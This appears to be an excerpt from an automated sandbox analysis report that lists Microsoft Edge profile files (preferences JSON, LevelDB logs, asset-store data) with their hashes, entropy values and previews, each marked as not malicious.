                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1
                                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:L:L
                                                                                                                                                                            MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                            SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                            SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                            SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8450
                                                                                                                                                                            Entropy (8bit):5.215774013272929
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihzWvXpkAsY8bV+FiA66WjLlaFIMYWPLMJ:stFSBso0xhzWvibGix6WjLlaTYB
                                                                                                                                                                            MD5:0475CBA17D181B47D5A9F08E5BD1B807
                                                                                                                                                                            SHA1:0EFC6A23C930FDCB4FA0342BA8004DF928320143
                                                                                                                                                                            SHA-256:3DD1F16B1D662AB38FE3FB0CAD1C0C8905FF9D613EA47977C9B0F5AE0FAB5712
                                                                                                                                                                            SHA-512:5EB2DB06BE627C81E04042A423D34A6733EE4F7B8B99B07AA273A038A97BFD67DCE8A11BC271821830C456F58F7303833F7F1DF4BE74B08627F6CB2367F0B2F0
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8285
                                                                                                                                                                            Entropy (8bit):5.218879715917992
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:stFSBso0CZihzWvXpkAsY8bV+FiA66WjTaFIMYWPLMJ:stFSBso0xhzWvibGix6WjTaTYB
                                                                                                                                                                            MD5:33F54F8FAF14970E74B19FC1D299C514
                                                                                                                                                                            SHA1:238E3852CCFFC25673F29078CB0F98B16C21C54F
                                                                                                                                                                            SHA-256:63B88DC1266D18D2B9DA7E2A107A82DD563F1EEA31666CB0F9313C3C0C7ED593
                                                                                                                                                                            SHA-512:FDBB2350AC8E38D463F9A16EA7F6489A6B6F5E54305E840BEA135D4CF532F33C8AB9E14663214E4EB30C3993121CBF0F3C59B40AEBDB0F5DD488C49848C836A5
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13378379979405004","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13378379979391881"},"dual_engine":{"consumer_mode":{"ie_user":false},"consumer_site_list_with_ie_entries":false,"consumer_sitelist_location":"","consumer_sitelist_version":"","external_consumer_shared_cookie_data":{},"shared_cookie_data":{},"sitelist_data_2":{},"sitelist_has_consumer_data":false,"sitelist_has_enterprise_data":false,"sitelist_location":"","sitelist_source":0,"sitelist_version":""},"edge":{
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):30210
                                                                                                                                                                            Entropy (8bit):5.566136929891675
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7b37pLGLPLSWPMOf1d8F1+UoAYDCx9Tuqh0VfUC9xbog/OVtEQ2CnOrwpbpto:MhD7bxcPLSWPMOf1du1jaEEQrnLpnta
                                                                                                                                                                            MD5:0713352AAEC283701309F511FF3DCB73
                                                                                                                                                                            SHA1:6C6EDBC2BBFE00AA919632FFC73158F96492DE0E
                                                                                                                                                                            SHA-256:20D105B09D4FA0020B67D8C5B32E98DE2638F275917969E7B48BD685263D7BD5
                                                                                                                                                                            SHA-512:1181FC208F3FE89C2D49D54EC7FC6AC3AD8216EBD13A06BB4E891F4AD454AF4FFA1A7CFB52D3519896FE3B6A60EF19C8C4F940097AD52213FA1567EC39F8DE4B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):480975
                                                                                                                                                                            Entropy (8bit):5.394826940127414
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3072:v+477TZyhJOGiMlbOFbXG/KFd2X13p8S15tndAYDI11csxH:v+4zZoOG1eLG/KKp8cdAYDI11csh
                                                                                                                                                                            MD5:FFB1C3BC78CD3BDDE1E32A847411707E
                                                                                                                                                                            SHA1:E6F6A4C9E9EF011799EFE18F6BC9ADCDF6BF24AD
                                                                                                                                                                            SHA-256:F3244085AF939693DAA3F6D1D9AC63F29A1BF7324E89C78619913D9629A3892B
                                                                                                                                                                            SHA-512:0F6DD515E7E662B89B15397084687EEBA447F2E6670F0B27C7E34F6028758B33BC6B9AA921FF2171836F08FFDB2967C8004F062E805F7097118BAAA1111F5665
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                            Entropy (8bit):5.099279559664645
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7CXF0M+q2P923oH+Tcwt9Eh1tIFUt8OCRFhZmw+OSMVkwO923oH+Tcwt9Eh15LJ:7UOM+v4Yeb9Eh16FUt8O2h/+OSMV5LYf
                                                                                                                                                                            MD5:84E976774033461B1B788EC9FB330B90
                                                                                                                                                                            SHA1:0A95E7507BE7C3F84FE98E15BC92A8A85C34CCA5
                                                                                                                                                                            SHA-256:A3D0BD7DAB30084B6E474826F4E2342F36DD741B801759BEF0DCBE1273E16F97
                                                                                                                                                                            SHA-512:19573F4693924A43E45A2D398986C9781B410F4DF4B87A1F2D55A5397143848E542E42CB9049A688686FE1CE0A368090DC6AF220C8FEF1666940ED0CEFCDC9ED
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:42:38.502 128c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/11-03:42:38.504 128c Recovering log #3.2024/12/11-03:42:38.512 128c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                            Entropy (8bit):5.099279559664645
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7CXF0M+q2P923oH+Tcwt9Eh1tIFUt8OCRFhZmw+OSMVkwO923oH+Tcwt9Eh15LJ:7UOM+v4Yeb9Eh16FUt8O2h/+OSMV5LYf
                                                                                                                                                                            MD5:84E976774033461B1B788EC9FB330B90
                                                                                                                                                                            SHA1:0A95E7507BE7C3F84FE98E15BC92A8A85C34CCA5
                                                                                                                                                                            SHA-256:A3D0BD7DAB30084B6E474826F4E2342F36DD741B801759BEF0DCBE1273E16F97
                                                                                                                                                                            SHA-512:19573F4693924A43E45A2D398986C9781B410F4DF4B87A1F2D55A5397143848E542E42CB9049A688686FE1CE0A368090DC6AF220C8FEF1666940ED0CEFCDC9ED
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:42:38.502 128c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/11-03:42:38.504 128c Recovering log #3.2024/12/11-03:42:38.512 128c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):336
                                                                                                                                                                            Entropy (8bit):5.099279559664645
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7CXF0M+q2P923oH+Tcwt9Eh1tIFUt8OCRFhZmw+OSMVkwO923oH+Tcwt9Eh15LJ:7UOM+v4Yeb9Eh16FUt8O2h/+OSMV5LYf
                                                                                                                                                                            MD5:84E976774033461B1B788EC9FB330B90
                                                                                                                                                                            SHA1:0A95E7507BE7C3F84FE98E15BC92A8A85C34CCA5
                                                                                                                                                                            SHA-256:A3D0BD7DAB30084B6E474826F4E2342F36DD741B801759BEF0DCBE1273E16F97
                                                                                                                                                                            SHA-512:19573F4693924A43E45A2D398986C9781B410F4DF4B87A1F2D55A5397143848E542E42CB9049A688686FE1CE0A368090DC6AF220C8FEF1666940ED0CEFCDC9ED
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:42:38.502 128c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/11-03:42:38.504 128c Recovering log #3.2024/12/11-03:42:38.512 128c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):348
                                                                                                                                                                            Entropy (8bit):5.232975016368335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7IIq2P923oH+TcwtnG2tMsIFUt8OGsZmw+OGMkwO923oH+TcwtnG2tMsLJ:7pv4Yebn9GFUt8O5/+OT5LYebn95J
                                                                                                                                                                            MD5:D84E410EC8A9C858B129EE7CFEF3D505
                                                                                                                                                                            SHA1:EFD954228165A7ECD0E5568E5AE719F3315AC086
                                                                                                                                                                            SHA-256:E8E0E52FB5F0589A39B6DACD1818697F3533B35E0565B660E4269C7E24CD24DE
                                                                                                                                                                            SHA-512:1E2BB33ACC0CD08A99290B699CF9008298771BE13E7B573EE86357719D59C786DC1C190B76EBFE1AAEA6BAA32472D83B0A43BEC63DB29063C23E90243AC49C86
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.383 1574 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/11-03:39:38.384 1574 Recovering log #3.2024/12/11-03:39:38.384 1574 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):348
                                                                                                                                                                            Entropy (8bit):5.232975016368335
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7IIq2P923oH+TcwtnG2tMsIFUt8OGsZmw+OGMkwO923oH+TcwtnG2tMsLJ:7pv4Yebn9GFUt8O5/+OT5LYebn95J
                                                                                                                                                                            MD5:D84E410EC8A9C858B129EE7CFEF3D505
                                                                                                                                                                            SHA1:EFD954228165A7ECD0E5568E5AE719F3315AC086
                                                                                                                                                                            SHA-256:E8E0E52FB5F0589A39B6DACD1818697F3533B35E0565B660E4269C7E24CD24DE
                                                                                                                                                                            SHA-512:1E2BB33ACC0CD08A99290B699CF9008298771BE13E7B573EE86357719D59C786DC1C190B76EBFE1AAEA6BAA32472D83B0A43BEC63DB29063C23E90243AC49C86
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.383 1574 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/11-03:39:38.384 1574 Recovering log #3.2024/12/11-03:39:38.384 1574 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                            MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                            SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                            SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                            SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):321
                                                                                                                                                                            Entropy (8bit):5.220165516762738
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7yVt+q2P923oH+Tcwt8aPrqIFUt8OTZmw+O8nVkwO923oH+Tcwt8amLJ:7y+v4YebL3FUt8OT/+OA5LYebQJ
                                                                                                                                                                            MD5:7D9F9D984B9EAD8F0FD84799B4C3F3B1
                                                                                                                                                                            SHA1:D2DF66D6652539170CDB1CD8F920B54AB0AD4ABD
                                                                                                                                                                            SHA-256:A63F8059AA2178418BE2B01B5D0F4ACDD23D54ECF88BED6CD075B5573FB00593
                                                                                                                                                                            SHA-512:57C5B36F36210E23AC6DF194A16AACF96C17767AA502BCF5CDBD20518906E1406F8CFD66CD5AC69CA5D395D8330BEEAB99D71F5872630C0169E123125AC72981
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.546 4d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/11-03:39:38.547 4d8 Recovering log #3.2024/12/11-03:39:38.548 4d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):321
                                                                                                                                                                            Entropy (8bit):5.220165516762738
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7yVt+q2P923oH+Tcwt8aPrqIFUt8OTZmw+O8nVkwO923oH+Tcwt8amLJ:7y+v4YebL3FUt8OT/+OA5LYebQJ
                                                                                                                                                                            MD5:7D9F9D984B9EAD8F0FD84799B4C3F3B1
                                                                                                                                                                            SHA1:D2DF66D6652539170CDB1CD8F920B54AB0AD4ABD
                                                                                                                                                                            SHA-256:A63F8059AA2178418BE2B01B5D0F4ACDD23D54ECF88BED6CD075B5573FB00593
                                                                                                                                                                            SHA-512:57C5B36F36210E23AC6DF194A16AACF96C17767AA502BCF5CDBD20518906E1406F8CFD66CD5AC69CA5D395D8330BEEAB99D71F5872630C0169E123125AC72981
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.546 4d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/11-03:39:38.547 4d8 Recovering log #3.2024/12/11-03:39:38.548 4d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):418
                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                            MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                            SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                            SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                            SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                            Entropy (8bit):5.192698215665074
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7+FN+q2P923oH+Tcwt865IFUt8O/5Zmw+OQVkwO923oH+Tcwt86+ULJ:7+Ov4Yeb/WFUt8Oh/+OI5LYeb/+SJ
                                                                                                                                                                            MD5:0C781934C69EAECCAA5BBFF41F5E4918
                                                                                                                                                                            SHA1:9D20F2B61CD40E72F5D3B36DC8D6B9CF939C232D
                                                                                                                                                                            SHA-256:C09810AD945EBB7598DDF51D93984AD2A51D2906143CC418F59CBB7566328532
                                                                                                                                                                            SHA-512:4FB37F777F447C85EE92107E0955D2EB7D1CA7BA38F79E08CD827864B20D6B0CCE7C444F7CDC9541B4A52292331D86F8AD74B18B021DF68996499CF77B3172F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.731 4d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/11-03:39:38.732 4d8 Recovering log #3.2024/12/11-03:39:38.733 4d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):325
                                                                                                                                                                            Entropy (8bit):5.192698215665074
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7+FN+q2P923oH+Tcwt865IFUt8O/5Zmw+OQVkwO923oH+Tcwt86+ULJ:7+Ov4Yeb/WFUt8Oh/+OI5LYeb/+SJ
                                                                                                                                                                            MD5:0C781934C69EAECCAA5BBFF41F5E4918
                                                                                                                                                                            SHA1:9D20F2B61CD40E72F5D3B36DC8D6B9CF939C232D
                                                                                                                                                                            SHA-256:C09810AD945EBB7598DDF51D93984AD2A51D2906143CC418F59CBB7566328532
                                                                                                                                                                            SHA-512:4FB37F777F447C85EE92107E0955D2EB7D1CA7BA38F79E08CD827864B20D6B0CCE7C444F7CDC9541B4A52292331D86F8AD74B18B021DF68996499CF77B3172F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.731 4d8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/11-03:39:38.732 4d8 Recovering log #3.2024/12/11-03:39:38.733 4d8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1254
                                                                                                                                                                            Entropy (8bit):1.8784775129881184
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                            MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                            SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                            SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                            SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):324
                                                                                                                                                                            Entropy (8bit):5.177097241668169
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7q5AVq2P923oH+Tcwt8NIFUt8Oq5AgZmw+OzoRNAIkwO923oH+Tcwt8+eLJ:7q5AVv4YebpFUt8Oq5Ag/+OzoLAI5LYN
                                                                                                                                                                            MD5:74951722B19F46F7587855BF995EE1C6
                                                                                                                                                                            SHA1:7737C70DF63569721AD906A74B805960B540279E
                                                                                                                                                                            SHA-256:39D4239953D00D564A0DD95EF5B56799283270715B47F4845E83891410D8339C
                                                                                                                                                                            SHA-512:24F52A5961742CEE30652C0E8F8DF77516C9E250C58F42EA700C280B108AB29DE2E064FC1118BE5F314ADE2BA95F18060FA3F6A5F1F552C09154DEC23BC86F1F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.469 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/11-03:39:39.469 12b4 Recovering log #3.2024/12/11-03:39:39.470 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):324
                                                                                                                                                                            Entropy (8bit):5.177097241668169
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7q5AVq2P923oH+Tcwt8NIFUt8Oq5AgZmw+OzoRNAIkwO923oH+Tcwt8+eLJ:7q5AVv4YebpFUt8Oq5Ag/+OzoLAI5LYN
                                                                                                                                                                            MD5:74951722B19F46F7587855BF995EE1C6
                                                                                                                                                                            SHA1:7737C70DF63569721AD906A74B805960B540279E
                                                                                                                                                                            SHA-256:39D4239953D00D564A0DD95EF5B56799283270715B47F4845E83891410D8339C
                                                                                                                                                                            SHA-512:24F52A5961742CEE30652C0E8F8DF77516C9E250C58F42EA700C280B108AB29DE2E064FC1118BE5F314ADE2BA95F18060FA3F6A5F1F552C09154DEC23BC86F1F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.469 12b4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/11-03:39:39.469 12b4 Recovering log #3.2024/12/11-03:39:39.470 12b4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):429
                                                                                                                                                                            Entropy (8bit):5.809210454117189
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                            MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                            SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                            SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                            SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                            Malicious:false
